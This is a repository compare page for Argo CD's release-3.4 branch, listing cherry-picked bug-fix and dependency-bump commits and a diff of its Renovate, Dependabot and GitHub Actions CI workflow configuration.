Compare commits

29 Commits

Author SHA1 Message Date
argo-cd-cherry-pick-bot[bot]
a061d1c664 fix: prevent automatic refreshes from informer resync and status updates (cherry-pick #25290 for 3.4) (#27229)
Signed-off-by: Atif Ali <atali@redhat.com>
Co-authored-by: Atif Ali <atali@redhat.com>
Co-authored-by: Keith Chong <kykchong@redhat.com>
2026-04-09 15:53:23 -04:00
argo-cd-cherry-pick-bot[bot]
67d12ebbd4 fix(hook): Fixed hook code issues that caused stuck applications on "Deleting" state (Issues #18355 and #17191) (cherry-pick #26724 for 3.4) (#27257)
Signed-off-by: Nikolaos Astyrakakis <nastyrakakis@gmail.com>
Co-authored-by: Nikolaos Astyrakakis <3193713+nikos445@users.noreply.github.com>
2026-04-09 06:04:06 -10:00
argo-cd-cherry-pick-bot[bot]
58a6f85650 fix(ui): handle 401 error in stream (cherry-pick #26917 for 3.4) (#27228)
Signed-off-by: linghaoSu <linghao.su@daocloud.io>
Co-authored-by: Linghao Su <linghao.su@daocloud.io>
2026-04-08 15:36:56 +02:00
argo-cd-cherry-pick-bot[bot]
60fed8b4ec chore(deps): bump github.com/go-jose/go-jose/v4 from 4.1.3 to 4.1.4 (cherry-pick #27101 for 3.4) (#27207)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2026-04-07 09:25:44 -04:00
argo-cd-cherry-pick-bot[bot]
0a29bfd093 fix: use unique names for initial commits (cherry-pick #27171 for 3.4) (#27198)
Signed-off-by: Sean Liao <sean@liao.dev>
Co-authored-by: Sean Liao <sean@liao.dev>
2026-04-06 16:47:33 -04:00
argo-cd-cherry-pick-bot[bot]
33247b96fe fix(hydrator): preserve all source type fields in GetDrySource() (cherry-pick #27189 for 3.4) (#27196)
Signed-off-by: Alexandre Gaudreault <alexandre_gaudreault@intuit.com>
Co-authored-by: Alexandre Gaudreault <alexandre_gaudreault@intuit.com>
2026-04-06 15:47:03 -04:00
argo-cd-cherry-pick-bot[bot]
696a18f7d3 fix: Add X-Frame-Options and CSP headers to Swagger UI endpoints (cherry-pick #26521 for 3.4) (#27153)
Signed-off-by: rohansood10 <rohansood10@users.noreply.github.com>
Signed-off-by: Blake Pettersson <blake.pettersson@gmail.com>
Co-authored-by: Rohan Sood <56945243+rohansood10@users.noreply.github.com>
Co-authored-by: rohansood10 <rohansood10@users.noreply.github.com>
Co-authored-by: Blake Pettersson <blake.pettersson@gmail.com>
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
2026-04-06 04:36:21 +03:00
argo-cd-cherry-pick-bot[bot]
b648248984 fix: trigger app sync on app-set spec change (cherry-pick #26811 for 3.4) (#27131)
Signed-off-by: Patroklos Papapetrou <ppapapetrou76@gmail.com>
Co-authored-by: Papapetrou Patroklos <1743100+ppapapetrou76@users.noreply.github.com>
2026-04-05 15:51:24 -04:00
argo-cd-cherry-pick-bot[bot]
99e29c7d91 fix(docs): Fix manifest path in Source Hydrator docs (cherry-pick #27123 for 3.4) (#27166)
Signed-off-by: Oliver Gondža <ogondza@gmail.com>
Co-authored-by: Oliver Gondža <ogondza@gmail.com>
2026-04-05 10:22:55 -04:00
rumstead
f50abb6596 fix(controller): reduce secret deepcopies and deserialization (#27049) (cherry-pick release-3.4) (#27132)
Signed-off-by: rumstead <37445536+rumstead@users.noreply.github.com>
2026-04-02 15:07:56 -04:00
argo-cd-cherry-pick-bot[bot]
a244f7cb7a fix(server): Ensure OIDC config is refreshed at server restart (cherry-pick #26913 for 3.4) (#27115)
Signed-off-by: OpenGuidou <guillaume.doussin@gmail.com>
Co-authored-by: OpenGuidou <73480729+OpenGuidou@users.noreply.github.com>
2026-04-01 17:58:24 -07:00
Jonathan Ogilvie
f4e7a6e604 [release-3.4] fix: improve perf: switch parentUIDToChildren to map of sets, remove cache rebuild (#26863) (#27110)
Signed-off-by: Jonathan Ogilvie <jonathan.ogilvie@sumologic.com>
Signed-off-by: Jonathan Ogilvie <679297+jcogilvie@users.noreply.github.com>
2026-04-01 11:45:22 -04:00
argo-cd-cherry-pick-bot[bot]
dfa079b5e3 fix: pass repo.insecure flag to helm dependency build (cherry-pick #27078 for 3.4) (#27082)
Signed-off-by: Blake Pettersson <blake.pettersson@gmail.com>
Co-authored-by: Blake Pettersson <blake.pettersson@gmail.com>
2026-03-30 22:38:34 -10:00
argo-cd-cherry-pick-bot[bot]
8550f60a05 fix: force attempt http2 with custom tls config (#26975) (cherry-pick #26976 for 3.4) (#27073)
Signed-off-by: Max Verbeek <m4xv3rb33k@gmail.com>
Co-authored-by: Max Verbeek <m4xv3rb33k@gmail.com>
2026-03-30 05:37:06 -10:00
github-actions[bot]
d29ec76295 Bump version to 3.4.0-rc4 on release-3.4 branch (#27046)
Signed-off-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
Co-authored-by: crenshaw-dev <350466+crenshaw-dev@users.noreply.github.com>
2026-03-27 10:07:01 -04:00
argo-cd-cherry-pick-bot[bot]
249b91d75b fix: wrong installation id returned from cache (cherry-pick #26969 for 3.4) (#27028)
Signed-off-by: Zach Aller <zach_aller@intuit.com>
Co-authored-by: Zach Aller <zachaller@users.noreply.github.com>
2026-03-27 09:24:20 -04:00
argo-cd-cherry-pick-bot[bot]
ed4c63ba83 fix: controller incorrectly detecting diff during app normalization (cherry-pick #27002 for 3.4) (#27014)
Signed-off-by: Alexander Matyushentsev <alexander@akuity.io>
Co-authored-by: Alexander Matyushentsev <AMatyushentsev@gmail.com>
2026-03-25 14:13:02 -07:00
github-actions[bot]
cbdc3f1397 Bump version to 3.4.0-rc3 on release-3.4 branch (#27006)
Signed-off-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
Co-authored-by: reggie-k <19544836+reggie-k@users.noreply.github.com>
2026-03-25 15:46:13 +02:00
argo-cd-cherry-pick-bot[bot]
b66dea4282 fix: Hook resources not created at PostSync when configured with PreDelete PostDelete hooks (cherry-pick #26996 for 3.4) (#26998)
Signed-off-by: reggie-k <regina.voloshin@codefresh.io>
Co-authored-by: Regina Voloshin <regina.voloshin@codefresh.io>
2026-03-25 13:23:57 +02:00
argo-cd-cherry-pick-bot[bot]
aced2b1b36 fix(ui): Improve message on self-healing disabling panel (#26977) (cherry-pick #26978 for 3.4) (#26980)
Signed-off-by: Alberto Chiusole <chiusole@seqera.io>
Co-authored-by: Alberto Chiusole <1922124+bebosudo@users.noreply.github.com>
2026-03-24 17:57:32 +02:00
argo-cd-cherry-pick-bot[bot]
ea71adbae5 chore(deps): bump google.golang.org/grpc from 1.79.2 to 1.79.3 (cherry-pick #26886 for 3.4) (#26952)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Blake Pettersson <blake.pettersson@gmail.com>
2026-03-22 15:46:39 +02:00
argo-cd-cherry-pick-bot[bot]
5ed403cf60 fix(server): fix find container logic for terminal (cherry-pick #26858 for 3.4) (#26933)
Signed-off-by: linghaoSu <linghao.su@daocloud.io>
Co-authored-by: Linghao Su <linghao.su@daocloud.io>
2026-03-20 13:00:53 +01:00
github-actions[bot]
9044c6c0ff Bump version to 3.4.0-rc2 on release-3.4 branch (#26927)
Signed-off-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
Co-authored-by: jannfis <3942683+jannfis@users.noreply.github.com>
2026-03-19 19:00:49 -04:00
argo-cd-cherry-pick-bot[bot]
3157fb15a4 feat(helm): support wildcard glob patterns for valueFiles (cherry-pick #26768 for 3.4) (#26919)
Signed-off-by: nitishfy <justnitish06@gmail.com>
Co-authored-by: Nitish Kumar <justnitish06@gmail.com>
2026-03-19 15:48:06 -04:00
argo-cd-cherry-pick-bot[bot]
e70034a44b fix(ci): add .gitkeep to images dir (cherry-pick #26892 for 3.4) (#26912)
Signed-off-by: Blake Pettersson <blake.pettersson@gmail.com>
Co-authored-by: Blake Pettersson <blake.pettersson@gmail.com>
2026-03-19 15:36:36 +02:00
argo-cd-cherry-pick-bot[bot]
5deef68eaf fix(ui): include _-prefixed dirs in embedded assets (cherry-pick #26589 for 3.4) (#26909)
Signed-off-by: choejwoo <jaewoo45@gmail.com>
Co-authored-by: Jaewoo Choi <jaewoo45@gmail.com>
2026-03-19 15:35:50 +02:00
argo-cd-cherry-pick-bot[bot]
21e13a621e fix(UI): show RollingSync step clearly when labels match no step (cherry-pick #26877 for 3.4) (#26882)
Signed-off-by: Atif Ali <atali@redhat.com>
Co-authored-by: Atif Ali <atali@redhat.com>
2026-03-17 21:41:53 -04:00
argo-cd-cherry-pick-bot[bot]
226178c1a5 fix: stack overflow when processing circular ownerrefs in resource graph (#26783) (cherry-pick #26790 for 3.4) (#26878)
Signed-off-by: Jonathan Ogilvie <jonathan.ogilvie@sumologic.com>
Signed-off-by: Jonathan Ogilvie <679297+jcogilvie@users.noreply.github.com>
Co-authored-by: Jonathan Ogilvie <679297+jcogilvie@users.noreply.github.com>
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
2026-03-17 22:55:48 +01:00
github-actions[bot]
d91a2ab3bf Bump version to 3.4.0-rc1 on release-3.4 branch (#26853)
Signed-off-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
Co-authored-by: reggie-k <19544836+reggie-k@users.noreply.github.com>
2026-03-16 12:43:12 +02:00
264 changed files with 33428 additions and 886169 deletions

@@ -11,7 +11,6 @@ module.exports = {
"github>argoproj/argo-cd//renovate-presets/custom-managers/yaml.json5",
"github>argoproj/argo-cd//renovate-presets/fix/disable-all-updates.json5",
"github>argoproj/argo-cd//renovate-presets/devtool.json5",
"github>argoproj/argo-cd//renovate-presets/docs.json5",
"group:aws-sdk-go-v2Monorepo"
"github>argoproj/argo-cd//renovate-presets/docs.json5"
]
}

@@ -8,9 +8,6 @@ updates:
ignore:
- dependency-name: k8s.io/*
groups:
aws-sdk-v2:
patterns:
- "github.com/aws/aws-sdk-go-v2*"
otel:
patterns:
- "go.opentelemetry.io/*"

@@ -4,10 +4,6 @@ on:
permissions: {}
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
prepare-release:
permissions:
@@ -16,12 +12,6 @@ jobs:
name: Automatically update major version
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
@@ -47,7 +37,7 @@ jobs:
working-directory: /home/runner/go/src/github.com/argoproj/argo-cd
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Add ~/go/bin to PATH
@@ -96,4 +86,4 @@ jobs:
- [ ] Add an upgrade guide to the docs for this version
branch: bump-major-version
branch-suffix: random
signoff: true
signoff: true

@@ -25,24 +25,14 @@ on:
CHERRYPICK_APP_PRIVATE_KEY:
required: true
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
cherry-pick:
name: Cherry Pick to ${{ inputs.version_number }}
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Generate a token
id: generate-token
uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0
uses: actions/create-github-app-token@29824e69f54612133e76f7eaac726eef6c875baf # v2.2.1
with:
app-id: ${{ secrets.CHERRYPICK_APP_ID }}
private-key: ${{ secrets.CHERRYPICK_APP_PRIVATE_KEY }}
@@ -76,7 +66,6 @@ jobs:
# Create new branch for cherry-pick
CHERRY_PICK_BRANCH="cherry-pick-${{ inputs.pr_number }}-to-${TARGET_BRANCH}"
git checkout -b "$CHERRY_PICK_BRANCH" "origin/$TARGET_BRANCH"
# Perform cherry-pick
@@ -86,17 +75,12 @@ jobs:
# Extract Signed-off-by from the cherry-pick commit
SIGNOFF=$(git log -1 --pretty=format:"%B" | grep -E '^Signed-off-by:' || echo "")
# Push the new branch. Force push to ensure that in case the original cherry-pick branch is stale,
# that the current state of the $TARGET_BRANCH + cherry-pick gets in $CHERRY_PICK_BRANCH.
git push origin -f "$CHERRY_PICK_BRANCH"
# Push the new branch
git push origin "$CHERRY_PICK_BRANCH"
# Save data for PR creation
echo "branch_name=$CHERRY_PICK_BRANCH" >> "$GITHUB_OUTPUT"
{
echo "signoff<<EOF"
echo "$SIGNOFF"
echo "EOF"
} >> "$GITHUB_OUTPUT"
echo "signoff=$SIGNOFF" >> "$GITHUB_OUTPUT"
echo "target_branch=$TARGET_BRANCH" >> "$GITHUB_OUTPUT"
else
echo "❌ Cherry-pick failed due to conflicts"
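The hunk above contrasts two ways of writing the extracted sign-off to `$GITHUB_OUTPUT`: a single `key=value` line versus a heredoc-delimited block. A runnable sketch of why the heredoc form is needed for multi-line values (the temp file stands in for the runner-provided `$GITHUB_OUTPUT`; the sign-off value is illustrative):

```shell
#!/usr/bin/env bash
set -euo pipefail

# Stand-in for the runner-provided $GITHUB_OUTPUT file.
GITHUB_OUTPUT="$(mktemp)"

# A value that can span several lines, like the Signed-off-by trailers
# extracted with `git log -1` in the step above.
SIGNOFF=$'Signed-off-by: A <a@example.com>\nSigned-off-by: B <b@example.com>'

# The single-line form, echo "signoff=$SIGNOFF", only records values that
# fit on one line; an embedded newline splits the entry into a second,
# malformed line. The heredoc form delimits the whole value instead:
{
  echo "signoff<<EOF"
  echo "$SIGNOFF"
  echo "EOF"
} >> "$GITHUB_OUTPUT"

cat "$GITHUB_OUTPUT"
```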

@@ -6,10 +6,6 @@ on:
- master
types: ["labeled", "closed"]
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
find-labels:
name: Find Cherry Pick Labels
@@ -22,12 +18,6 @@ jobs:
outputs:
labels: ${{ steps.extract-labels.outputs.labels }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Extract cherry-pick labels
id: extract-labels
run: |
@@ -60,4 +50,4 @@ jobs:
pr_title: ${{ github.event.pull_request.title }}
secrets:
CHERRYPICK_APP_ID: ${{ vars.CHERRYPICK_APP_ID }}
CHERRYPICK_APP_PRIVATE_KEY: ${{ secrets.CHERRYPICK_APP_PRIVATE_KEY }}
CHERRYPICK_APP_PRIVATE_KEY: ${{ secrets.CHERRYPICK_APP_PRIVATE_KEY }}

@@ -14,9 +14,7 @@ on:
env:
# Golang version to use across CI steps
# renovate: datasource=golang-version packageName=golang
GOLANG_VERSION: '1.26.2'
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
GOLANG_VERSION: '1.26.0'
concurrency:
group: ${{ github.workflow }}-${{ github.ref }}
@@ -33,11 +31,6 @@ jobs:
frontend: ${{ steps.filter.outputs.frontend_any_changed }}
docs: ${{ steps.filter.outputs.docs_any_changed }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- uses: tj-actions/changed-files@22103cc46bda19c2b464ffe86db46df6922fd323 # v47.0.5
id: filter
@@ -61,15 +54,10 @@ jobs:
needs:
- changes
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Download all Go modules
@@ -86,27 +74,18 @@ jobs:
needs:
- changes
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Restore go build and module cache
uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
- name: Restore go build cache
uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
with:
path: |
~/.cache/go-build
~/go/pkg/mod
key: ${{ runner.os }}-go-build-v1-${{ hashFiles('**/go.sum') }}
restore-keys: |
${{ runner.os }}-go-build-v1-
- name: Download Go modules
path: ~/.cache/go-build
key: ${{ runner.os }}-go-build-v1-${{ github.run_id }}
- name: Download all Go modules
run: |
go mod download
- name: Compile all packages
@@ -122,22 +101,17 @@ jobs:
needs:
- changes
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Run golangci-lint
uses: golangci/golangci-lint-action@1e7e51e771db61008b38414a730f564565cf7c20 # v9.2.0
with:
# renovate: datasource=go packageName=github.com/golangci/golangci-lint/v2 versioning=regex:^v(?<major>\d+)\.(?<minor>\d+)\.(?<patch>\d+)?$
version: v2.11.4
version: v2.11.3
args: --verbose
test-go:
@@ -151,11 +125,6 @@ jobs:
GITHUB_TOKEN: ${{ secrets.E2E_TEST_GITHUB_TOKEN || secrets.GITHUB_TOKEN }}
GITLAB_TOKEN: ${{ secrets.E2E_TEST_GITLAB_TOKEN }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Create checkout directory
run: mkdir -p ~/go/src/github.com/argoproj
- name: Checkout code
@@ -163,7 +132,7 @@ jobs:
- name: Create symlink in GOPATH
run: ln -s $(pwd) ~/go/src/github.com/argoproj/argo-cd
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Install required packages
@@ -182,15 +151,11 @@ jobs:
- name: Add /usr/local/bin to PATH
run: |
echo "/usr/local/bin" >> $GITHUB_PATH
- name: Restore go build and module cache
uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
- name: Restore go build cache
uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
with:
path: |
~/.cache/go-build
~/go/pkg/mod
key: ${{ runner.os }}-go-build-v1-${{ hashFiles('**/go.sum') }}
restore-keys: |
${{ runner.os }}-go-build-v1-
path: ~/.cache/go-build
key: ${{ runner.os }}-go-build-v1-${{ github.run_id }}
- name: Install all tools required for building & testing
run: |
make install-test-tools-local
@@ -202,7 +167,7 @@ jobs:
run: |
git config --global user.name "John Doe"
git config --global user.email "john.doe@example.com"
- name: Download Go modules
- name: Download and vendor all required packages
run: |
go mod download
- name: Run all unit tests
@@ -224,11 +189,6 @@ jobs:
GITHUB_TOKEN: ${{ secrets.E2E_TEST_GITHUB_TOKEN || secrets.GITHUB_TOKEN }}
GITLAB_TOKEN: ${{ secrets.E2E_TEST_GITLAB_TOKEN }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Create checkout directory
run: mkdir -p ~/go/src/github.com/argoproj
- name: Checkout code
@@ -236,7 +196,7 @@ jobs:
- name: Create symlink in GOPATH
run: ln -s $(pwd) ~/go/src/github.com/argoproj/argo-cd
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Install required packages
@@ -255,15 +215,11 @@ jobs:
- name: Add /usr/local/bin to PATH
run: |
echo "/usr/local/bin" >> $GITHUB_PATH
- name: Restore go build and module cache
uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
- name: Restore go build cache
uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
with:
path: |
~/.cache/go-build
~/go/pkg/mod
key: ${{ runner.os }}-go-build-v1-${{ hashFiles('**/go.sum') }}
restore-keys: |
${{ runner.os }}-go-build-v1-
path: ~/.cache/go-build
key: ${{ runner.os }}-go-build-v1-${{ github.run_id }}
- name: Install all tools required for building & testing
run: |
make install-test-tools-local
@@ -275,7 +231,7 @@ jobs:
run: |
git config --global user.name "John Doe"
git config --global user.email "john.doe@example.com"
- name: Download Go modules
- name: Download and vendor all required packages
run: |
go mod download
- name: Run all unit tests
@@ -293,15 +249,10 @@ jobs:
needs:
- changes
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Create symlink in GOPATH
@@ -355,31 +306,26 @@ jobs:
needs:
- changes
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Install pnpm
uses: pnpm/action-setup@a7487c7e89a18df4991f7f222e4898a00d66ddda # v4.1.0
with:
package_json_file: ui/package.json
- name: Setup NodeJS
uses: actions/setup-node@53b83947a5a98c8d113130e565377fae1a50d02f # v6.3.0
with:
# renovate: datasource=node-version packageName=node versioning=node
node-version: '22.9.0'
cache: 'pnpm'
cache-dependency-path: '**/pnpm-lock.yaml'
- name: Restore node dependency cache
id: cache-dependencies
uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
with:
path: ui/node_modules
key: ${{ runner.os }}-node-dep-v2-${{ hashFiles('**/yarn.lock') }}
- name: Install node dependencies
run: |
cd ui && pnpm i --frozen-lockfile
cd ui && yarn install --frozen-lockfile --ignore-optional --non-interactive
- name: Build UI code
run: |
pnpm test
pnpm build
yarn test
yarn build
env:
NODE_ENV: production
NODE_ONLINE_ENV: online
@@ -388,7 +334,7 @@ jobs:
CODECOV_TOKEN: ${{ github.ref == 'refs/heads/master' && secrets.CODECOV_TOKEN || '' }}
working-directory: ui/
- name: Run ESLint
run: pnpm lint
run: yarn lint
working-directory: ui/
shellcheck:
@@ -413,15 +359,19 @@ jobs:
sonar_secret: ${{ secrets.SONAR_TOKEN }}
codecov_secret: ${{ secrets.CODECOV_TOKEN }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
fetch-depth: 0
- name: Restore node dependency cache
id: cache-dependencies
uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
with:
path: ui/node_modules
key: ${{ runner.os }}-node-dep-v2-${{ hashFiles('**/yarn.lock') }}
- name: Remove other node_modules directory
run: |
rm -rf ui/node_modules/argo-ui/node_modules
- name: Get e2e code coverage
uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8.0.1
with:
@@ -442,7 +392,7 @@ jobs:
- name: Upload code coverage information to codecov.io
# Only run when the workflow is for upstream (PR target or push is in argoproj/argo-cd).
if: github.repository == 'argoproj/argo-cd'
uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v6.0.0
uses: codecov/codecov-action@671740ac38dd9b0130fbe1cec585b89eea48d3de # v5.5.2
with:
files: test-results/full-coverage.out
fail_ci_if_error: true
@@ -451,7 +401,7 @@ jobs:
- name: Upload test results to Codecov
# Codecov uploads test results to Codecov.io on upstream master branch.
if: github.repository == 'argoproj/argo-cd' && github.ref == 'refs/heads/master' && github.event_name == 'push'
uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v6.0.0
uses: codecov/codecov-action@671740ac38dd9b0130fbe1cec585b89eea48d3de # v5.5.2
with:
files: test-results/junit.xml
fail_ci_if_error: true
@@ -461,7 +411,7 @@ jobs:
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}
uses: SonarSource/sonarqube-scan-action@299e4b793aaa83bf2aba7c9c14bedbb485688ec4 # v7.1.0
uses: SonarSource/sonarqube-scan-action@a31c9398be7ace6bbfaf30c0bd5d415f843d45e9 # v7.0.0
if: env.sonar_secret != ''
test-e2e:
name: Run end-to-end tests
@@ -494,11 +444,6 @@ jobs:
GITHUB_TOKEN: ${{ secrets.E2E_TEST_GITHUB_TOKEN || secrets.GITHUB_TOKEN }}
GITLAB_TOKEN: ${{ secrets.E2E_TEST_GITLAB_TOKEN }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Free Disk Space (Ubuntu)
uses: jlumbroso/free-disk-space@54081f138730dfa15788a46383842cd2f914a1be
with:
@@ -509,21 +454,12 @@ jobs:
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Set GOPATH
run: |
echo "GOPATH=$HOME/go" >> $GITHUB_ENV
- name: Setup NodeJS
uses: actions/setup-node@53b83947a5a98c8d113130e565377fae1a50d02f # v6.3.0
with:
# renovate: datasource=node-version packageName=node versioning=node
node-version: '22.9.0'
- name: Install pnpm
uses: pnpm/action-setup@a7487c7e89a18df4991f7f222e4898a00d66ddda # v4.1.0
with:
package_json_file: ui/package.json
- name: GH actions workaround - Kill XSP4 process
run: |
sudo pkill mono || true
@@ -539,15 +475,11 @@ jobs:
sudo chown $(whoami) $HOME/.kube/config
sudo chmod go-r $HOME/.kube/config
kubectl version
- name: Restore go build and module cache
uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
- name: Restore go build cache
uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
with:
path: |
~/.cache/go-build
~/go/pkg/mod
key: ${{ runner.os }}-go-build-v1-${{ hashFiles('**/go.sum') }}
restore-keys: |
${{ runner.os }}-go-build-v1-
path: ~/.cache/go-build
key: ${{ runner.os }}-go-build-v1-${{ github.run_id }}
- name: Add ~/go/bin to PATH
run: |
echo "$HOME/go/bin" >> $GITHUB_PATH
@@ -557,12 +489,10 @@ jobs:
- name: Add ./dist to PATH
run: |
echo "$(pwd)/dist" >> $GITHUB_PATH
- name: Download Go modules
- name: Download Go dependencies
run: |
go mod download
- name: Install goreman
run: |
go install github.com/mattn/goreman@v0.3.17
go install github.com/mattn/goreman@latest
- name: Install all tools required for building & testing
run: |
make install-test-tools-local
@@ -630,11 +560,6 @@ jobs:
- changes
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
